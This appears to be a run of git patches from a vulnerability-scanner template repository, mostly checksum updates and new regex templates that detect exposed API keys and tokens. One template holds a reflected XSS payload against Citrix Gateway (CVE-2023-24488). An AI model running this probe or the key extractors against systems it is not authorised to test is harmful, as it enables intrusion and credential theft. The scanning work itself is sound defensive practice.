-network/cves/2023/CVE-2023-33246.yaml:d4904c6ee3d1774bc926bad481db45aacd24e3f8 +network/cves/2023/CVE-2023-33246.yaml:6cd8eb482b6199a6c7298a99ae2bb0e41f2c4c3f network/default-login/ldap-anonymous-login.yaml:48fa5969a454ef01ca1cc73deb5423f764de8790 network/detect-addpac-voip-gateway.yaml:22e2a91cf086715101f77677b1c4276f6a11ca98 network/detect-jabber-xmpp.yaml:2735b8056f61ce2ccea063d2038838bfbed81a54 @@ -6448,7 +6448,7 @@ network/enumeration/niagara-fox-info-enum.yaml:850b5da39d09697db2df5321e4b726e6e network/enumeration/psql-user-enum.yaml:0a2f5b0095347687d51554f03cd5141463855dd0 network/enumeration/smtp/smtp-user-enum.yaml:b87cdee6e50d171463194c28ab104f32f51a2f42 network/enumeration/smtp-commands-enum.yaml:833575f9bd672a15739debf1aab8afdb547a0a43 -network/expn-mail-detect.yaml:bc3c315e851ed7c29b91b6fbfdbcae84929403b7 +network/expn-mail-detect.yaml:ea9b02907ca016b2f52e153cbdaab31777064c78 network/exposed-adb.yaml:257a4b487d9b137291729e6d854ba65b588f6bac network/exposed-dockerd.yaml:38d028778904ad743e17ef4928bc535cb7dcc8b3 network/exposed-redis.yaml:d8d81feb18118792c88b7d3349d72d4275b5533a @@ -6471,12 +6471,12 @@ network/vsftpd-backdoor.yaml:6ddecfe71f4c667b9b8fe2495c91ed9c48d5709d network/vulnerabilities/clockwatch-enterprise-rce.yaml:67c4a02fbc6455b622022ba0d435662d6347c4a7 ssl/c2/asyncrat-c2.yaml:cbc251e12a123f6f46296a76779cd952e0264f55 ssl/c2/bitrat-c2.yaml:c67772010d602be81f00f76493e5ce09c267496a -ssl/c2/cobalt-strike-c2.yaml:68409733bcc9e95861d748f04f935008b787e523 +ssl/c2/cobalt-strike-c2.yaml:fa3905fc13397006d2bdba8729cf4879f3ecf541 ssl/c2/covenant-c2-ssl.yaml:8cee367255ac8991147f62d17f65c7b812017ee8 ssl/c2/dcrat-server-c2.yaml:b02d2def8f288479b8f1cb737314359f7165fd03 ssl/c2/gozi-malware.yaml:6ee74f0fc8547bb46cbf1786e312a74de4fa5479 ssl/c2/icedid.yaml:b9632d381fade1fa3163d38d504c01d111720c37 -ssl/c2/metasploit-c2.yaml:4eb556b544c5adda049e118cb0dcde07e26c6f73 +ssl/c2/metasploit-c2.yaml:24a24bd75f14c4a25c7f88c1b2143efd68672235 ssl/c2/orcus-rat-c2.yaml:46fa20a8b13acdcc1d1809fa2f66f42ad3e759ad ssl/c2/posh-c2.yaml:fd5df3096d9fdd0f717d4981e512bd11e56c73b9 ssl/c2/quasar-rat-c2.yaml:91673602a38a05ebf84560129bf8d7cd389be5ff @@ -6493,7 +6493,7 @@ ssl/ssl-dns-names.yaml:aab93262d20a05bc780bf63d7c6d971611408d4e ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:7ab90033845c8fd761be452af7fb2a87dc5f7eec -templates-checksum.txt:2bd94c0ad412fcd7fd1d78d173153f439a834ea0 +templates-checksum.txt:adce9fe9023ffa1ab839186248a48ae56d8f0b79 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From 44852575e9e6747f08836b686899058d9a821879 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 4 Jul 2023 08:22:03 +0000 Subject: [PATCH 335/609] Auto Generated New Template Addition List [Tue Jul 4 08:22:03 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 7a65ff4a4c..d374468717 100644 --- a/.new-additions +++ b/.new-additions @@ -3,6 +3,7 @@ file/webshell/jsp-webshell.yaml file/webshell/php-webshell.yaml http/cves/2018/CVE-2018-6530.yaml http/cves/2023/CVE-2023-28121.yaml +http/exposed-panels/arangodb-web-Interface.yaml http/exposed-panels/dell-idrac.yaml http/exposed-panels/pritunl-panel.yaml http/exposed-panels/untangle-admin-login.yaml From d482ccc026936a398a4fac7acd32ad0a5e35af6c Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 4 Jul 2023 08:22:16 +0000 Subject: [PATCH 336/609] Auto Generated Templates Checksum [Tue Jul 4 08:22:16 UTC 2023] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 801c7a287f..a3b0bd1144 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2492,6 +2492,7 @@ http/exposed-panels/appsmith-web-login.yaml:bc361a3e4f6a021632ac1a8046f3538f2703 http/exposed-panels/appwrite-panel.yaml:40dae5138e0278eb81207a973e23cac840698246 http/exposed-panels/aptus-panel.yaml:29b3f8d2e0b74c8e8b9f8d56fb423a1fc967352c http/exposed-panels/aqua-enterprise-panel.yaml:3cc8efaa89d82293c1f36c6c270953884f7fc8ff +http/exposed-panels/arangodb-web-Interface.yaml:985d1f3fe31acafef9098b4cc696d9186a0aca5c http/exposed-panels/arcgis/arcgis-panel.yaml:d3868325015954e4185168103932f7bf4351aa80 http/exposed-panels/arcgis/arcgis-rest-api.yaml:13a24d8cae266f0262519f7aebef401b46ee0746 http/exposed-panels/arcgis/arcgis-services.yaml:82ce551d279a9d6c531a18f099e2046f9e3594ea @@ -6493,7 +6494,7 @@ ssl/ssl-dns-names.yaml:aab93262d20a05bc780bf63d7c6d971611408d4e ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:7ab90033845c8fd761be452af7fb2a87dc5f7eec -templates-checksum.txt:adce9fe9023ffa1ab839186248a48ae56d8f0b79 +templates-checksum.txt:647de1b5b58546b7b3204d78b8f28eaba289bf7d wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From 90af3233369a9279147690d89f88c641e1225a29 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 4 Jul 2023 08:23:31 +0000 Subject: [PATCH 337/609] TemplateMan Update [Tue Jul 4 08:23:31 UTC 2023] :robot: --- http/exposed-panels/arangodb-web-Interface.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/http/exposed-panels/arangodb-web-Interface.yaml b/http/exposed-panels/arangodb-web-Interface.yaml index eb54210349..f72c36efb4 100644 --- a/http/exposed-panels/arangodb-web-Interface.yaml +++ b/http/exposed-panels/arangodb-web-Interface.yaml @@ -9,8 +9,9 @@ info: reference: - https://www.arangodb.com/docs/stable/ metadata: - verified: "true" + max-request: 1 shodan-query: http.title:"ArangoDB Web Interface" + verified: "true" tags: panel,arangodb,login http: From fb4fec8c92b91d08df1ae741a1c87527566639bf Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 4 Jul 2023 13:58:03 +0530 Subject: [PATCH 338/609] Updated tags --- http/cves/2001/CVE-2001-0537.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2001/CVE-2001-0537.yaml b/http/cves/2001/CVE-2001-0537.yaml index ea0869b5d1..37b2b32615 100644 --- a/http/cves/2001/CVE-2001-0537.yaml +++ b/http/cves/2001/CVE-2001-0537.yaml @@ -19,7 +19,7 @@ info: max-request: 1 verified: true shodan-query: product:"Cisco IOS http config" && 200 - tags: cve,cve2001,cisco,ios,bypass + tags: cve,cve2001,cisco,ios,auth-bypass http: - method: GET From ea64eff6831ef652b10f694acd3951761f91ecf6 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Tue, 4 Jul 2023 14:06:49 +0530 Subject: [PATCH 339/609] Update uptime-kuma-panel.yaml --- http/exposed-panels/uptime-kuma-panel.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/exposed-panels/uptime-kuma-panel.yaml b/http/exposed-panels/uptime-kuma-panel.yaml index fa60d28d71..b026a08331 100644 --- a/http/exposed-panels/uptime-kuma-panel.yaml +++ b/http/exposed-panels/uptime-kuma-panel.yaml @@ -10,9 +10,9 @@ info: - https://github.com/louislam/uptime-kuma - https://uptime.kuma.pet/docs/ metadata: + max-request: 1 verified: true shodan-query: title:"Uptime Kuma" - max-request: 1 tags: uptime,kuma,panel,login http: From 6ac87ba5268613d8f017a9dc387550645004c305 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 4 Jul 2023 14:24:43 +0530 Subject: [PATCH 340/609] Update CVE-2023-24488.yaml --- http/cves/2023/CVE-2023-24488.yaml | 9 ++++++++- 1 file changed, 8 insertions(+), 1 deletion(-) diff --git a/http/cves/2023/CVE-2023-24488.yaml b/http/cves/2023/CVE-2023-24488.yaml index ebab836f1c..d27d036c9d 100644 --- a/http/cves/2023/CVE-2023-24488.yaml +++ b/http/cves/2023/CVE-2023-24488.yaml @@ -26,15 +26,22 @@ http: - method: GET path: - '{{BaseURL}}/oauth/idp/logout?post_logout_redirect_uri=%0D%0A%0D%0A%3Cbody+x=%27&%27onload=%22(alert)(%27citrix+akamai+bypass%27)%22%3E' + - '{{BaseURL}}/oauth/idp/logout?post_logout_redirect_uri=%0d%0a%0d%0a' + stop-at-first-match: true matchers-condition: and matchers: - type: word part: body words: - + - + condition: or + + - type: word + part: body + words: - "Content-Type: text/html" - condition: and - type: status status: From 6d0d4dd206b92bba7a3dcca2beeb00252f3dd556 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 4 Jul 2023 09:05:10 +0000 Subject: [PATCH 342/609] Auto Generated Templates Checksum [Tue Jul 4 09:05:10 UTC 2023] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index a3b0bd1144..51dad2472f 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2256,7 +2256,7 @@ http/cves/2023/CVE-2023-24243.yaml:f7140f03e945019aeacaecc8b17522e54b76c22b http/cves/2023/CVE-2023-24278.yaml:73df5ba94e0c9c9d4bb93e84e0aff81a08e9e02e http/cves/2023/CVE-2023-24322.yaml:d5974d1b331522108a5c6887310883dc37e2dc84 http/cves/2023/CVE-2023-24367.yaml:bbd47946b2f67527112614488332589093ee79f9 -http/cves/2023/CVE-2023-24488.yaml:c8c3bd7790562f2d541e123230ec03da08e34f97 +http/cves/2023/CVE-2023-24488.yaml:34e23a93619e8092f6655376e9d006ee71509c29 http/cves/2023/CVE-2023-24657.yaml:a74e32282a92bcd670fd99eb1f795ebbeb3cfd1f http/cves/2023/CVE-2023-24733.yaml:371ec9554e1239ff6f5278113e9938f331d238b7 http/cves/2023/CVE-2023-24735.yaml:5531cc3389cc427a38868696e7a22919348cdba9 @@ -2492,7 +2492,7 @@ http/exposed-panels/appsmith-web-login.yaml:bc361a3e4f6a021632ac1a8046f3538f2703 http/exposed-panels/appwrite-panel.yaml:40dae5138e0278eb81207a973e23cac840698246 http/exposed-panels/aptus-panel.yaml:29b3f8d2e0b74c8e8b9f8d56fb423a1fc967352c http/exposed-panels/aqua-enterprise-panel.yaml:3cc8efaa89d82293c1f36c6c270953884f7fc8ff -http/exposed-panels/arangodb-web-Interface.yaml:985d1f3fe31acafef9098b4cc696d9186a0aca5c +http/exposed-panels/arangodb-web-Interface.yaml:979ddd42d407ebf6b682d0e8ac141f1f3f0f136d http/exposed-panels/arcgis/arcgis-panel.yaml:d3868325015954e4185168103932f7bf4351aa80 http/exposed-panels/arcgis/arcgis-rest-api.yaml:13a24d8cae266f0262519f7aebef401b46ee0746 http/exposed-panels/arcgis/arcgis-services.yaml:82ce551d279a9d6c531a18f099e2046f9e3594ea @@ -6494,7 +6494,7 @@ ssl/ssl-dns-names.yaml:aab93262d20a05bc780bf63d7c6d971611408d4e ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:7ab90033845c8fd761be452af7fb2a87dc5f7eec -templates-checksum.txt:647de1b5b58546b7b3204d78b8f28eaba289bf7d +templates-checksum.txt:6e9f0c6d5696079d72dadc2809a531b2b7bcef8f wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From 61343fba51a3419ca9c3c195635fe51f2c4e3337 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 4 Jul 2023 09:06:45 +0000 Subject: [PATCH 343/609] TemplateMan Update [Tue Jul 4 09:06:45 UTC 2023] :robot: --- http/cves/2023/CVE-2023-24488.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2023/CVE-2023-24488.yaml b/http/cves/2023/CVE-2023-24488.yaml index d27d036c9d..74de1dcd02 100644 --- a/http/cves/2023/CVE-2023-24488.yaml +++ b/http/cves/2023/CVE-2023-24488.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-24488 cwe-id: CWE-79 metadata: - max-request: 1 + max-request: 2 shodan-query: title:"Citrix Gateway" tags: cve,cve2023,citrix,xss,adc From 7e193f72472c37e9c2543cc01117d4ae4c1d1871 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 4 Jul 2023 14:39:14 +0530 Subject: [PATCH 344/609] 20 New Templates --- file/keys/adafruit-key.yaml | 22 +++++++++++++++++ file/keys/adobe/adobe-client.yaml | 22 +++++++++++++++++ file/keys/{ => adobe}/adobe-secret.yaml | 0 file/keys/airtable-key.yaml | 22 +++++++++++++++++ file/keys/algolia-key.yaml | 22 +++++++++++++++++ file/keys/alibaba/alibaba-key-id.yaml | 22 +++++++++++++++++ file/keys/alibaba/alibaba-secret-id.yaml | 22 +++++++++++++++++ file/keys/asana/asana-clientid.yaml | 22 +++++++++++++++++ file/keys/asana/asana-clientsecret.yaml | 22 +++++++++++++++++ file/keys/atlassian/atlassian-api-token.yaml | 22 +++++++++++++++++ .../tokens/adafruit/adafruit-api-key.yaml | 24 +++++++++++++++++++ .../tokens/adobe/adobe-client-id.yaml | 24 +++++++++++++++++++ .../tokens/airtable/airtable-api-key.yaml | 24 +++++++++++++++++++ .../tokens/algolia/algolia-api-key.yaml | 24 +++++++++++++++++++ .../tokens/alibaba/alibaba-accesskey-id.yaml | 24 +++++++++++++++++++ .../tokens/alibaba/alibaba-secretkey-id.yaml | 24 +++++++++++++++++++ .../tokens/asana/asana-client-id.yaml | 24 +++++++++++++++++++ .../tokens/asana/asana-client-secret.yaml | 24 +++++++++++++++++++ http/exposures/tokens/atlassian-token.yaml | 24 +++++++++++++++++++ 19 files changed, 414 insertions(+) create mode 100644 file/keys/adafruit-key.yaml create mode 100644 file/keys/adobe/adobe-client.yaml rename file/keys/{ => adobe}/adobe-secret.yaml (100%) create mode 100644 file/keys/airtable-key.yaml create mode 100644 file/keys/algolia-key.yaml create mode 100644 file/keys/alibaba/alibaba-key-id.yaml create mode 100644 file/keys/alibaba/alibaba-secret-id.yaml create mode 100644 file/keys/asana/asana-clientid.yaml create mode 100644 file/keys/asana/asana-clientsecret.yaml create mode 100644 file/keys/atlassian/atlassian-api-token.yaml create mode 100644 http/exposures/tokens/adafruit/adafruit-api-key.yaml create mode 100644 http/exposures/tokens/adobe/adobe-client-id.yaml create mode 100644 http/exposures/tokens/airtable/airtable-api-key.yaml create mode 100644 http/exposures/tokens/algolia/algolia-api-key.yaml create mode 100644 http/exposures/tokens/alibaba/alibaba-accesskey-id.yaml create mode 100644 http/exposures/tokens/alibaba/alibaba-secretkey-id.yaml create mode 100644 http/exposures/tokens/asana/asana-client-id.yaml create mode 100644 http/exposures/tokens/asana/asana-client-secret.yaml create mode 100644 http/exposures/tokens/atlassian-token.yaml diff --git a/file/keys/adafruit-key.yaml b/file/keys/adafruit-key.yaml new file mode 100644 index 0000000000..efd9a38d4d --- /dev/null +++ b/file/keys/adafruit-key.yaml @@ -0,0 +1,22 @@ +id: adafruit-key + +info: + name: Adafruit API Key + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/adafruit-api-key.yaml + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/adafruit-api-key.go + metadata: + verified: true + tags: adafruit,file,keys + +file: + - extensions: + - all + + extractors: + - type: regex + part: body + regex: + - (?i)(?:adafruit)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9_-]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file diff --git a/file/keys/adobe/adobe-client.yaml b/file/keys/adobe/adobe-client.yaml new file mode 100644 index 0000000000..c8647bfc99 --- /dev/null +++ b/file/keys/adobe/adobe-client.yaml @@ -0,0 +1,22 @@ +id: adobe-client + +info: + name: Adobe Client ID + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/adobe-client-id.yaml + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/adobe-client-id.go + metadata: + verified: true + tags: adobe,file,token + +file: + - extensions: + - all + + extractors: + - type: regex + part: body + regex: + - (?i)(?:adobe)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-f0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file diff --git a/file/keys/adobe-secret.yaml b/file/keys/adobe/adobe-secret.yaml similarity index 100% rename from file/keys/adobe-secret.yaml rename to file/keys/adobe/adobe-secret.yaml diff --git a/file/keys/airtable-key.yaml b/file/keys/airtable-key.yaml new file mode 100644 index 0000000000..20c3eb5596 --- /dev/null +++ b/file/keys/airtable-key.yaml @@ -0,0 +1,22 @@ +id: airtable-key + +info: + name: Airtable API Key + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/airtable-api-key.yaml + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/airtable-api-key.go + metadata: + verified: true + tags: airtable,file,token + +file: + - extensions: + - all + + extractors: + - type: regex + part: body + regex: + - (?i)(?:airtable)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{17})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file diff --git a/file/keys/algolia-key.yaml b/file/keys/algolia-key.yaml new file mode 100644 index 0000000000..7724867bb5 --- /dev/null +++ b/file/keys/algolia-key.yaml @@ -0,0 +1,22 @@ +id: algolia-key + +info: + name: Algolia API Key + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/algolia-api-key.yaml + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/algolia-api-key.go + metadata: + verified: true + tags: algolia,file,keys + +file: + - extensions: + - all + + extractors: + - type: regex + part: body + regex: + - (?i)(?:algolia)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file diff --git a/file/keys/alibaba/alibaba-key-id.yaml b/file/keys/alibaba/alibaba-key-id.yaml new file mode 100644 index 0000000000..faeed4e86a --- /dev/null +++ b/file/keys/alibaba/alibaba-key-id.yaml @@ -0,0 +1,22 @@ +id: alibaba-key-id + +info: + name: Alibaba Access Key ID + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/alibaba-access-key-id.yaml + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/alibaba-access-key-id.go + metadata: + verified: true + tags: alibaba,access,file,keys + +file: + - extensions: + - all + + extractors: + - type: regex + part: body + regex: + - (?i)\b((LTAI)(?i)[a-z0-9]{20})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file diff --git a/file/keys/alibaba/alibaba-secret-id.yaml b/file/keys/alibaba/alibaba-secret-id.yaml new file mode 100644 index 0000000000..9324354baf --- /dev/null +++ b/file/keys/alibaba/alibaba-secret-id.yaml @@ -0,0 +1,22 @@ +id: alibaba-secret-id + +info: + name: Alibaba Secret Key ID + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/alibaba-secret-key.yaml + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/alibaba-secret-key.go + metadata: + verified: true + tags: alibaba,secret,file,keys + +file: + - extensions: + - all + + extractors: + - type: regex + part: body + regex: + - (?i)(?:alibaba)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{30})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file diff --git a/file/keys/asana/asana-clientid.yaml b/file/keys/asana/asana-clientid.yaml new file mode 100644 index 0000000000..62c4909718 --- /dev/null +++ b/file/keys/asana/asana-clientid.yaml @@ -0,0 +1,22 @@ +id: asana-clientid + +info: + name: Asana Client ID + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/asana-client-id.go + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/asana-client-id.yaml + metadata: + verified: true + tags: asana,client,file,keys + +file: + - extensions: + - all + + extractors: + - type: regex + part: body + regex: + - (?i)(?:asana)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([0-9]{16})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file diff --git a/file/keys/asana/asana-clientsecret.yaml b/file/keys/asana/asana-clientsecret.yaml new file mode 100644 index 0000000000..fa63975189 --- /dev/null +++ b/file/keys/asana/asana-clientsecret.yaml @@ -0,0 +1,22 @@ +id: asana-clientsecret + +info: + name: Asana Client Secret + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/asana-client-secret.go + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/asana-client-secret.yaml + metadata: + verified: true + tags: asana,client,file,keys,secret + +file: + - extensions: + - all + + extractors: + - type: regex + part: body + regex: + - (?i)(?:asana)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file diff --git a/file/keys/atlassian/atlassian-api-token.yaml b/file/keys/atlassian/atlassian-api-token.yaml new file mode 100644 index 0000000000..7b9af43161 --- /dev/null +++ b/file/keys/atlassian/atlassian-api-token.yaml @@ -0,0 +1,22 @@ +id: atlassian-api-token + +info: + name: Atlassian API Token + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/atlassian-api-token.go + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/atlassian-api-token.yaml + metadata: + verified: true + tags: atlassian,file,token,api + +file: + - extensions: + - all + + extractors: + - type: regex + part: body + regex: + - (?i)(?:atlassian|confluence|jira)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{24})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file diff --git a/http/exposures/tokens/adafruit/adafruit-api-key.yaml b/http/exposures/tokens/adafruit/adafruit-api-key.yaml new file mode 100644 index 0000000000..23d0721e95 --- /dev/null +++ b/http/exposures/tokens/adafruit/adafruit-api-key.yaml @@ -0,0 +1,24 @@ +id: adafruit-api-key + +info: + name: Adafruit API Key + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/adafruit-api-key.yaml + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/adafruit-api-key.go + metadata: + max-request: 1 + verified: true + tags: adafruit,exposure,tokens + +http: + - method: GET + path: + - "{{BaseURL}}" + + extractors: + - type: regex + part: body + regex: + - (?i)(?:adafruit)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9_-]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file diff --git a/http/exposures/tokens/adobe/adobe-client-id.yaml b/http/exposures/tokens/adobe/adobe-client-id.yaml new file mode 100644 index 0000000000..94b313aea4 --- /dev/null +++ b/http/exposures/tokens/adobe/adobe-client-id.yaml @@ -0,0 +1,24 @@ +id: adobe-client-id + +info: + name: Adobe Client ID + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/adobe-client-id.yaml + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/adobe-client-id.go + metadata: + verified: true + max-request: 1 + tags: adobe,exposure,tokens + +http: + - method: GET + path: + - "{{BaseURL}}" + + extractors: + - type: regex + part: body + regex: + - (?i)(?:adobe)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-f0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file diff --git a/http/exposures/tokens/airtable/airtable-api-key.yaml b/http/exposures/tokens/airtable/airtable-api-key.yaml new file mode 100644 index 0000000000..a24d23940b --- /dev/null +++ b/http/exposures/tokens/airtable/airtable-api-key.yaml @@ -0,0 +1,24 @@ +id: airtable-api-key + +info: + name: Airtable API Key + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/airtable-api-key.yaml + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/airtable-api-key.go + metadata: + verified: true + max-request: 1 + tags: airtable,exposure,tokens + +http: + - method: GET + path: + - "{{BaseURL}}" + + extractors: + - type: regex + part: body + regex: + - (?i)(?:airtable)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{17})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file diff --git a/http/exposures/tokens/algolia/algolia-api-key.yaml b/http/exposures/tokens/algolia/algolia-api-key.yaml new file mode 100644 index 0000000000..5730442639 --- /dev/null +++ b/http/exposures/tokens/algolia/algolia-api-key.yaml @@ -0,0 +1,24 @@ +id: algolia-api-key + +info: + name: Algolia API Key + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/algolia-api-key.yaml + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/algolia-api-key.go + metadata: + max-request: 1 + verified: true + tags: algolia,exposure,tokens + +http: + - method: GET + path: + - "{{BaseURL}}" + + extractors: + - type: regex + part: body + regex: + - (?i)(?:algolia)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file diff --git a/http/exposures/tokens/alibaba/alibaba-accesskey-id.yaml b/http/exposures/tokens/alibaba/alibaba-accesskey-id.yaml new file mode 100644 index 0000000000..2f24f2c263 --- /dev/null +++ b/http/exposures/tokens/alibaba/alibaba-accesskey-id.yaml @@ -0,0 +1,24 @@ +id: alibaba-accesskey-id + +info: + name: Alibaba Access Key ID + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/alibaba-access-key-id.yaml + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/alibaba-access-key-id.go + metadata: + max-request: 1 + verified: true + tags: alibaba,exposure,tokens + +http: + - method: GET + path: + - "{{BaseURL}}" + + extractors: + - type: regex + part: body + regex: + - (?i)\b((LTAI)(?i)[a-z0-9]{20})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file diff --git 